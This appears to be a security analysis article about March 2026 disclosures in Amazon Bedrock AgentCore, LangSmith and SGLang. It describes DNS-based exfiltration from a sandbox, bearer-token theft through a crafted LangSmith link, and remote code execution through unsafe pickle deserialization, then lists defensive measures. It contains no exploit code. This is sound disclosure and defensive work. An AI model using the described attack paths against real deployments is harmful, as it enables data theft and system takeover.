When AI Boundaries Fail: Bedrock, LangSmith, and SGLang Raise the Stakes

Recent Bedrock AgentCore, LangSmith, and SGLang disclosures show how weak AI boundaries can combine data leakage, token theft, and remote code execution.
The issue is not one framework. It is boundary collapse.
Security teams often review AI incidents as separate categories: data leakage, phishing, credential theft, or remote code execution. The more useful reading of the current disclosures is that these categories can stack. When execution environments, service interfaces, and trust boundaries are weak, the same AI deployment can leak data out of one side and hand arbitrary code execution to an attacker on the other.
That is the real lesson from the March 2026 disclosures around Amazon Bedrock AgentCore, LangSmith, and SGLang: operators trusted labels and defaults more than the actual security boundary.
As of March 18, 2026, the public record shows three related risk patterns: Bedrock AgentCore documentation that leaves a DNS path open in sandbox mode, a LangSmith Studio flaw that enabled token theft, and multiple SGLang deserialization issues that turned exposed service components into code-execution paths.
Amazon Bedrock AgentCore: a sandbox label does not mean zero egress
In AWS documentation for AgentCore Code Interpreter, Sandbox mode is described as providing limited external network access, but AWS also says the interpreter can access Amazon S3 and perform DNS resolution. That is not the same thing as a sealed environment.
AWS says Sandbox mode can “perform DNS resolution.”
By contrast, AWS documents VPC mode as allowing access to private resources while maintaining network isolation from the public internet. If a workflow handles sensitive prompts, intermediate files, retrieved knowledge, or model outputs, then a DNS-capable sandbox is not equivalent to an isolated enclave. A researcher disclosure framing this as a DNS-based exfiltration path is therefore consistent with the network behavior AWS documents, even though the exfiltration risk is an inference from the documented capability rather than a statement AWS makes in its own materials.
For leaders, the implication is operational. If you are using Bedrock AgentCore Code Interpreter in production, network mode is a governance decision. Prefer VPC placement for sensitive workloads, apply least-privilege security group rules, avoid unnecessary outbound routes, and log network behavior. If your team cannot observe DNS activity, then claiming the sandbox is isolated is wishful thinking rather than a verified control.
LangSmith: one clicked link could become account-level access
CVE-2026-25750 shows how quickly a trusted control plane can become a breach path. The GitHub advisory published on March 3, 2026 and the NVD entry published on March 4, 2026 describe a URL parameter injection issue in LangSmith Studio affecting versions prior to 0.12.71. If an authenticated user clicked a specially crafted link, their bearer token, user ID, and workspace ID could be sent to attacker-controlled infrastructure. With the token, the attacker could impersonate the victim and perform whatever actions that user was allowed to perform in the workspace.
The advisory says credentials could be “transmitted to an attacker-controlled server.”
The tokens reportedly expired after five minutes, and the attack required social engineering. But five minutes is not a comforting window when the target system is an AI observability and evaluation platform that may sit close to prompts, datasets, traces, model settings, and integration secrets.
According to the GitHub advisory, LangSmith Cloud was patched on December 20, 2025, and self-hosted customers need version 0.12.71 or later. For teams running self-hosted LangSmith, this is a reminder that AI control planes deserve the same outbound network restrictions, origin validation, and phishing-resistant access patterns as any other privileged internal system.
SGLang: unsafe deserialization became unauthenticated RCE
CVE-2026-3059 and CVE-2026-3060 were published on March 12, 2026 and, as of NVD updates on March 17, 2026, both carry CVSS 9.8 through CISA-ADP scoring. NVD describes them as unauthenticated remote code execution flaws in SGLang components that deserialize untrusted data with pickle.loads() over exposed interfaces.
CERT/CC's vulnerability note is especially useful because it connects the mechanics to deployment reality. If the vulnerable multimodal generation or encoder parallel disaggregation features are enabled, and an attacker can reach the relevant TCP port, they may be able to send a malicious payload that is deserialized by the service. CERT explicitly warns that deployments exposed to untrusted networks are at the highest risk.
The related CVE-2026-3989, published on March 12, 2026 and updated in NVD on March 16, 2026, is scored 7.8 High. It affects SGLang's replay_request_dump.py utility, where a malicious .pkl file can execute code when an operator replays a crash dump. It is more constrained than the network-facing issues, but it reflects the same design pattern: trusting a format that should never be trusted.
Python's own documentation says: “Only unpickle data you trust.”
Orca Security's March 11 analysis adds important context. It ties all three SGLang issues to repeated unsafe pickle use and says that, at publication time, no official patch was available. CERT/CC's public note likewise says no vendor statement had been obtained during coordinated disclosure. That means operators cannot outsource immediate risk reduction to vendor responsiveness. Network segmentation, interface exposure control, and feature disablement may be the only near-term defenses.
Why these disclosures belong in one board-level conversation
These are not isolated edge cases. Bedrock highlights the danger of assuming a sandbox label guarantees isolation. LangSmith shows how a trusted AI operations surface can become a token theft path. SGLang demonstrates how model-serving infrastructure can slide from unsafe serialization into full code execution. Different products, same strategic failure: trust boundaries were looser than teams believed.
That is why this is now a leadership decision, not just a security engineering backlog item. AI platforms combine tool execution, model context, data retrieval, service accounts, and operational dashboards in the same delivery chain. When that chain is weak, confidentiality, integrity, and availability risks become one compounding blast radius.
What teams should do before production scale
- Use VPC isolation by default for code interpreters, agent runtimes, and model-serving components that touch sensitive data or internal systems.
- Enforce least-privilege IAM for execution roles, service accounts, and API credentials attached to AI workloads.
- Restrict service interface exposure so broker ports, side channels, and debugging utilities are never reachable from untrusted networks unless there is an explicit, reviewed reason.
- Upgrade LangSmith self-hosted environments to 0.12.71 or later and review whether custom integrations replicated risky URL or outbound origin assumptions.
- Disable or tightly isolate vulnerable SGLang features and treat crash-dump replay inputs as hostile unless provenance is verified.
- Log DNS and egress activity because exfiltration claims cannot be meaningfully disproved if you do not monitor the remaining outbound paths.
- Make interface review a release gate for any AI system that mixes tool use, file handling, and autonomous execution.
Bottom line
The lesson from Bedrock AgentCore, LangSmith, and SGLang is simple: AI security is a boundary problem. If a sandbox resolves DNS, a studio link can export live tokens, or a serving component will deserialize untrusted bytes, the path from data exposure to code execution is shorter than teams assume.
The assumption that a sandbox label guarantees isolation is wrong here. Teams that want to scale agents and model-serving workloads safely should harden network placement, identity scope, and service interface exposure now.



Discussion
0Join the conversation
Sign in with your Google account to participate in the discussion, ask questions, and share your insights.